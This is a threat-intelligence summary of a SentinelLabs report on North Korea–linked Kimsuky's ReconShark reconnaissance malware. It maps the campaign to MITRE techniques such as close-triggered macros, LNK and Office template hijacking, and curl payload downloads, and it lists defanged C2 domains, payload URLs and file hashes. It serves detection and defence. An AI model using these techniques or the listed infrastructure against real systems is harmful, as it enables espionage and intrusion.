Threat Research

Kimsuky Evolves Reconnaissance Capabilities in New Global Campaign

Securonix

SentinelLabs reports ongoing Kimsuky operations using a new ReconShark component, delivered via targeted spear-phishing, OneDrive-hosted documents, and malicious macros. ReconShark functions as a reconnaissance tool that exfiltrates system and defense-detection information and communicates with a North Korea–linked infrastructure, underscoring a broader campaign pattern. Hashtags: #Kimsuky #ReconShark #BabyShark #KRG

Keypoints

  • Ongoing global campaigns by Kimsuky target think tanks, researchers, government entities, and related organizations across the US, Europe, and Asia, aligned with geopolitical topics such as China-North Korea nuclear agendas.
  • A new ReconShark component (a BabyShark reconnaissance variant) is deployed via spear-phishing and OneDrive-hosted documents, with macros triggering on document close.
  • ReconShark exfiltrates device information (running processes, battery status) and attempts to identify security tools present on the host.
  • It uses Windows Management Instrumentation (WMI) to gather information and checks for defense software such as ntrtscan, mbam, Norton Security, and Kaspersky.
  • Payload deployment is multi-stage, using scripts (VBS, HTA, Windows Batch), macro-enabled Office templates, and DLLs, with LNK edits and Office template replacements to execute code.
  • Malware infrastructure includes shared hosting (NameCheap) and C2 domains such as yonsei.lol, rfa.ink, and mitmail.tech, with beacons and redirects to legitimate sites as part of the command-and-control flow.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – Spear-phishing emails with OneDrive links to download a document; “The lure email contained the OneDrive shared file link.”
  • [T1566.001] Phishing: Spearphishing Attachment – Password-protected document attachment containing a macro; “The file downloaded is a password protected .doc file named “Research Proposal-Haowen Song.doc” (SHA1: 86a025e282495584eabece67e4e2a43dca28e505) which contains a malicious macro (SHA1: c8f54cb73c240a1904030eb36bb2baa7db6aeb01)”.
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Macros embedded in Office documents used to deliver and execute payloads; “The lure documents Kimsuky distributes contain Microsoft Office macros that activate on document close.”
  • [T1023] Shortcut Modification – ReconShark edits Windows Shortcuts (LNK files) to launch legitimate browsers and run malicious code; “ReconShark edits Windows Shortcuts (LNK files) to the msedge.exe, chrome.exe, outlook.exe, whale.exe, and firefox.exe applications. When executed, these LNK files start the linked legitimate applications and execute malicious code at the same time.”
  • [T1221] Template Injection – Replaces the default Office template (%AppData%MicrosoftTemplatesNormal.dotm) with a malicious template hosted at the C2; “replaces the default %AppData%MicrosoftTemplatesNormal.dotm Office template, which opens whenever a user starts Microsoft Word, with a malicious Office template hosted at the C2 server.”
  • [T1105] Ingress Tool Transfer – The malware can directly download a payload from the C2 server; “the malware can directly download a payload from the C2 server using the curl utility.”
  • [T1059.003] Windows Command Shell – Deployment via Windows Batch scripts; “Windows Batch scripts” are used as part of the payload chain.
  • [T1059.006] VBScript – Deployment via VBScript payloads (VBS); part of the multi-stage approach.
  • [T1059.007] HTML Application – Deployment via HTA scripts; “HTA script” used as part of payload execution.
  • [T1047] Windows Management Instrumentation – ReconShark uses WMI to query system data; “ReconShark relies on Windows Management Instrumentation (WMI) to query process and battery information.”
  • [T1057] Process Discovery – ReconShark enumerates running processes as part of information gathering.
  • [T1082] System Information Discovery – Retrieves system information such as battery status to assess host capabilities.
  • [T1041] Exfiltration Over C2 Channel – Collected data is uploaded to the C2 server via HTTP POST requests; “uploads them to the C2 server by issuing HTTP POST requests.”
  • [T1027] Obfuscated/Compressed Files or Information – Some strings are encrypted with a simple cipher to evade static detection; “strings are encrypted using a relatively simple cipher to evade static detection mechanisms.”
  • [T1071.001] Web Protocols – Beacons and C2 communications occur over web protocols to domains like rfa.ink and mitmail.tech; “beacons are made to the /bio/ directory of rfa[.]ink” and similar patterns across C2 domains.

Indicators of Compromise

  • [Domain] yonsei[.]lol – Phishing Email Sender Domain
  • [Domain] rfa[.]ink – C2 domain
  • [URL] https[:]//rfa[.]ink/bio/r.php – C2 endpoint
  • [URL] https[:]//mitmail[.]tech/gorgon/r.php – C2 endpoint
  • [URL] https[:]//rfa[.]ink/bio/t1.hta – ReconShark payload: HTA script
  • [URL] https[:]//rfa[.]ink/bio/ca.php?na=reg.gif – ReconShark payload: VBS script
  • [File Hash] 86a025e282495584eabece67e4e2a43dca28e505 – Lure Doc Example – SHA1
  • [File Hash] c8f54cb73c240a1904030eb36bb2baa7db6aeb01 – Macro – SHA1
  • [File Name] Research Proposal-Haowen Song.doc – Lure document

Read more: https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint